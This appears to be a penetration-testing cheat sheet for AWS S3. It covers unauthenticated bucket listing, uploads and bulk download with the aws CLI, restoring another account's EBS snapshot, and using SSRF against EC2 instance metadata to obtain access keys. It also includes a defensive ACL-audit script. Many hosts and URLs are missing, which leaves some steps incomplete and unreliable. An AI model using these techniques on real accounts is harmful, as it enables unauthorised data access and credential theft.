Amazon Bucket S3 AWS


  • AWS Configuration

  • Open Bucket

  • Basic tests

    • Listing files

    • Move a file into the bucket

    • Download everything

    • Check bucket disk size

  • AWS - Extract Backup

  • Bucket juicy data

AWS Configuration

Prerequisite: you need at least awscli.

sudo apt install awscli

You can get your credentials here, but you need an AWS account (free tier account):

aws configure
aws configure --profile nameofprofile

Then you can use --profile nameofprofile in aws commands.

Alternatively, you can use environment variables instead of creating a profile.

export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ

Open Bucket

By default, Amazon bucket names look like [bucket_name]/. You can browse open buckets if you know their names: [bucket_name]/

Their names are also listed if the listing is enabled.

<ListBucketResult xmlns="">

Alternatively, you can extract the name of an in-site S3 bucket with %C0. (Trick from

eg: http://redacted/avatar/123%C0

Basic tests

Listing files

aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
aws s3 ls s3:// --no-sign-request --region us-west-2

You can get the region with dig and nslookup.

$ dig
;; ANSWER SECTION:    5    IN    A

$ nslookup
Non-authoritative answer: name =

Move a file into the bucket

aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
aws s3 cp login.html s3://$bucketName --grants read=uri=
aws s3 mv test.txt s3://
FAIL : "move failed: ./test.txt to s3:// A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."

aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
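
One reason the listing and upload tests above can succeed is a bucket ACL that grants READ or WRITE to one of S3's global groups; --acl authenticated-read, for instance, grants READ to every AWS account, not only the owner's. The Python code below is an added example, not part of the original page: it audits the JSON printed by `aws s3api get-bucket-acl` for such grants. The function name, severity labels and sample ACL are assumptions made for illustration.

```python
import json

# Predefined S3 grantee groups that extend access beyond the owning account.
GLOBAL_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone (unauthenticated)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}

# What each bucket-level ACL permission allows the grantee to do.
EFFECT = {
    "READ": "list objects",
    "WRITE": "create, overwrite and delete objects",
    "READ_ACP": "read the bucket ACL",
    "WRITE_ACP": "rewrite the bucket ACL",
    "FULL_CONTROL": "list, write, read and rewrite the ACL",
}


def audit_bucket_acl(acl_json):
    """Return one finding per grant made to a global group, worst first."""
    findings = []
    for grant in json.loads(acl_json).get("Grants", []):
        grantee = grant.get("Grantee", {})
        who = GLOBAL_GROUPS.get(grantee.get("URI", ""))
        if grantee.get("Type") != "Group" or who is None:
            continue  # grants to the owner or a named account are not flagged
        perm = grant.get("Permission", "")
        severity = "high" if perm in ("WRITE", "WRITE_ACP", "FULL_CONTROL") else "medium"
        findings.append({"who": who, "permission": perm, "severity": severity,
                         "effect": EFFECT.get(perm, "unknown permission")})
    # Stable sort: "high" findings first, original order kept otherwise.
    return sorted(findings, key=lambda f: f["severity"] != "high")


# Constructed sample in the shape printed by `aws s3api get-bucket-acl`.
SAMPLE_ACL = json.dumps({
    "Owner": {"ID": "EXAMPLE-OWNER-ID"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-ID"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "WRITE"},
    ],
})

if __name__ == "__main__":
    for f in audit_bucket_acl(SAMPLE_ACL):
        print(f"[{f['severity']}] {f['who']}: {f['permission']} ({f['effect']})")
```

A bucket policy can also open a bucket, so an empty result here does not prove the bucket is private.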

Download everything

aws s3 sync s3:// . --no-sign-request --region us-west-2

Check bucket disk size

Use --no-sign-request for an unauthenticated check.

aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'

AWS - Extract Backup

$ aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",

$ aws --profile profile_name ec2 describe-snapshots
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89",

Create a volume using the snapshot
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89
In AWS Console -> EC2 -> New Ubuntu
$ chmod 400 YOUR_KEY.pem
$ ssh -i YOUR_KEY.pem

Mount the volume
$ lsblk
$ sudo file -s /dev/xvda1
$ sudo mount /dev/xvda1 /mnt

Bucket juicy data

Amazon exposes an internal service that every EC2 instance can query for instance metadata about the host. If you find an SSRF vulnerability in an application running on EC2, try requesting : will return the AccessKeyID, SecretAccessKey, and Token

For example with a proxy :

